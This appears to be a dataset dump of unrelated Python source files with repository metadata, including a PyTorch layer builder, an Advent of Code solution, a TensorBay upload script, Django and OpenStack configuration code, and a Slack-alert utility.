final_norm: bool = False,
):
# initial dense layer
layers = []
layers.append(
(
"linear_1",
torch.nn.Linear(
in_features, out_features if depth == 1 else middle_features
),
)
)
# iteratively construct batchnorm + relu + dense
for i in range(depth - 1):
layers.append(
(f"batchnorm_{i+1}", torch.nn.BatchNorm1d(num_features=middle_features))
)
layers.append((f"relu_{i+1}", torch.nn.ReLU()))
layers.append(
(
f"linear_{i+2}",
torch.nn.Linear(
middle_features,
out_features if i == depth - 2 else middle_features,
False if i == depth - 2 else bias,
),
)
)
if final_norm:
layers.append(
(f"batchnorm_{depth}", torch.nn.BatchNorm1d(num_features=out_features))
)
# return network
return torch.nn.Sequential(OrderedDict(layers))
| [
"okyksl@gmail.com"
] | okyksl@gmail.com |
8384bf2d6d10476e56073926954322e7f293947f | 7b7e956178f090b91c08b7908665ea88bbffebd5 | /venv/Scripts/easy_install-3.7-script.py | e368cf62a699209ce62e97e2fccad0c934e6ca55 | [] | no_license | MaDMikeNsk/First_TKINTER_App | f0a2ef88d2cdd97c93e266868e323099af667510 | 6d3e7a2fb70754bfaf9dbf855de6cc92e97fc1d4 | refs/heads/master | 2020-09-13T01:20:33.781738 | 2019-11-19T08:52:01 | 2019-11-19T08:52:01 | 222,619,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!C:\Python\PycharmProjects\First_TKINTER_App\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"mikemenshikov85@gmail.com"
] | mikemenshikov85@gmail.com |
0c3a69db6b7dde4d69970997de1238cf5226cc63 | db2ec9bb0df2f721edcbdf3199642838ef575cfa | /segmentation/ECSSD.py | 3c8aaf97bd830801ae2fea20ec49f307ec473629 | [] | no_license | racheltang2333/Graviti | d15c73201bae771264cf463c6df1515f877bc743 | 8fa13d81503ef2bb81a2158de56b54f12c7d9da4 | refs/heads/main | 2023-08-14T10:17:23.356714 | 2021-09-11T14:59:28 | 2021-09-11T14:59:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | import os
from tensorbay.client import config
from tensorbay.dataset import Data
from common.dataset_initial import INITIAL
config.timeout = 40
config.max_retries = 4
dataset_name = "ECSSD"
root_path = "G:\\download_dataset\\ECSSD"
imgs_fileName = [x for x in os.listdir(os.path.join(root_path, "images")) if x.endswith(".jpg")]
masks_fileName = [x for x in os.listdir(os.path.join(root_path, "ground_truth_mask")) if x.endswith(".png")]
initial = INITIAL(root_path, dataset_name, [], [])
gas, dataset = initial.generate_catalog()
segment = dataset.create_segment("train&test")
for img_fileName in imgs_fileName:
img_path = os.path.join(root_path, "images\\" + img_fileName)
data = Data(img_path)
segment.append(data)
dataset_client = gas.upload_dataset(dataset, jobs=12)
dataset_client.commit("Initial commit")
| [
"wanshantian@gmail.com"
] | wanshantian@gmail.com |
9a64ec6a72966090f86eda4bc0c90f01e8f55658 | 708b596778ccb1df05d15e2efd44a74be37f38cd | /chap1/q4.py | 4ba21e901d999c4e44fa9c47ce366aa241bb4565 | [] | no_license | japanesemankind/100knock | 943aa51e9d4d0fcbc3b27f01ea24785a843a4ab8 | c90d7274557706d50098fac59b4305b04080eb90 | refs/heads/master | 2023-06-20T06:09:48.007229 | 2021-07-21T06:40:36 | 2021-07-21T06:40:36 | 357,402,880 | 0 | 1 | null | 2021-05-19T09:23:38 | 2021-04-13T02:41:11 | Jupyter Notebook | UTF-8 | Python | false | false | 515 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
def q4(str_arg):
dict={}
one_char=[0,4,5,6,7,8,14,15,18]
words=re.sub(r',|\.','',str_arg).split()
for idx,word in enumerate(words):
if(idx in one_char):
words[idx]=word[0:1]
else:
words[idx]=word[0:2]
dict[words[idx]]=idx
return dict
print(q4("Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can"))
# In[ ]:
| [
"matsuno.takumi.gf@tut.jp"
] | matsuno.takumi.gf@tut.jp |
97d15d6f45852f8ad8f5576eff06fea5cb1089b3 | 43cbef9a8b7424fb7144255d1d9494be828e3b4c | /nes_randomizer/registration/urls.py | a6c54bd79ab683e6b46d4559d9fdcb440476523a | [] | no_license | thebmo/NESRandomizer | 59135814c3dd23d948af1f5ce7ca236c8f96dc56 | 1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f | refs/heads/master | 2020-07-05T08:19:02.916233 | 2015-11-03T03:34:32 | 2015-11-03T03:34:32 | 22,393,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.register, name='register'),
)
| [
"bmosier@gmail.com"
] | bmosier@gmail.com |
4f87b4ca7c3aa6e8268b5586166ac8fa4ad2bb6d | 190cf3017501d87c30cb584aac80bd79bbd4b26a | /day17-2.py | 642beb9c3de970f88cb9c9ebb11473116184eceb | [] | no_license | Maxtasy/adventofcode2020 | 9aedcb641c43010639904162dbc9195bb2b27ee8 | 76b3ca457fe491daeb118c5ec3d5bb9113bbf967 | refs/heads/master | 2023-02-14T14:40:57.439873 | 2020-12-22T16:00:57 | 2020-12-22T16:00:57 | 317,533,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | #https://adventofcode.com/2020/day/17
from collections import defaultdict
from copy import deepcopy
CYCLES = 6
def active_neighbor_count(hyperplane, coord):
count = 0
for w in range(-1, 2):
for z in range(-1, 2):
for y in range(-1, 2):
for x in range(-1, 2):
neighbor_coord = (coord[0]+w, coord[1]+z, coord[2]+y, coord[3]+x)
if neighbor_coord != coord and hyperplane[neighbor_coord]:
count += 1
return count
def part2(input_file):
with open(input_file, "r") as f:
lines = f.read().strip().split("\n")
hyperplane = defaultdict(lambda: False)
current_min_w = 0
current_max_w = 0
current_min_z = 0
current_max_z = 0
current_min_y = 0
current_max_y = 0
current_min_x = 0
current_max_x = 0
for y in range(len(lines)):
for x in range(len(lines[y])):
w = 0
z = 0
if lines[y][x] == "#":
hyperplane[(w, z, y, x)] = True
current_min_w = min(current_min_w, w)
current_max_w = max(current_max_w, w)
current_min_z = min(current_min_z, z)
current_max_z = max(current_max_z, z)
current_min_y = min(current_min_y, y)
current_max_y = max(current_max_y, y)
current_min_x = min(current_min_x, x)
current_max_x = max(current_max_x, x)
for _ in range(CYCLES):
hyperplane_copy = deepcopy(hyperplane)
for w in range(current_min_w - 1, current_max_w +2):
for z in range(current_min_z - 1, current_max_z + 2):
for y in range(current_min_y - 1, current_max_y + 2):
for x in range(current_min_x - 1, current_max_x + 2):
active_neighbors = active_neighbor_count(hyperplane_copy, (w, z, y, x))
if hyperplane_copy[(w, z, y, x)] and not active_neighbors in range(2,4):
hyperplane[(w, z, y, x)] = False
elif not hyperplane_copy[(w, z, y, x)] and active_neighbors == 3:
hyperplane[(w, z, y, x)] = True
current_min_w = min(current_min_w, w)
current_max_w = max(current_max_w, w)
current_min_z = min(current_min_z, z)
current_max_z = max(current_max_z, z)
current_min_y = min(current_min_y, y)
current_max_y = max(current_max_y, y)
current_min_x = min(current_min_x, x)
current_max_x = max(current_max_x, x)
active_count = 0
for coord in hyperplane:
if hyperplane[coord]:
active_count += 1
return active_count
def main():
input_file = "day17-input.txt"
print(part2(input_file))
if __name__ == "__main__":
main() | [
"maxtasy88@web.de"
] | maxtasy88@web.de |
46605773042e4694045207282c63666f3ac7d88a | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /network/security_group/openstack_driver.py | 9717ba421b4a63ea98d5328cfd53bec9b7f01766 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 1,631 | py | #coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
security_group_opts = [
cfg.StrOpt('security_group_api',
default='nova',
help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
if CONF.security_group_api.lower() == 'nova':
return importutils.import_object(NOVA_DRIVER)
elif CONF.security_group_api.lower() in ('neutron', 'quantum'):
return importutils.import_object(NEUTRON_DRIVER)
else:
return importutils.import_object(CONF.security_group_api)
def is_neutron_security_groups():
return CONF.security_group_api.lower() in ('neutron', 'quantum')
| [
"719184289@qq.com"
] | 719184289@qq.com |
0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb | edc80b253c0ad88a421f7cd341d695e601fde73d | /utils.py | 1194f99c9f18970a5625febf931cca1ec72e84ff | [
"MIT"
] | permissive | prashantramangupta/snet-platform-usage | 62cc4061326e89ca39c1b3105362fc4b4fb9509c | 41b0669ebebf116012f312a333d0b3cbcdcf8519 | refs/heads/master | 2022-11-04T23:57:35.611828 | 2022-10-13T05:03:05 | 2022-10-13T05:03:05 | 177,531,350 | 1 | 1 | MIT | 2022-10-12T10:20:37 | 2019-03-25T06:56:31 | Python | UTF-8 | Python | false | false | 1,607 | py | import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url | [
"you@example.com"
] | you@example.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.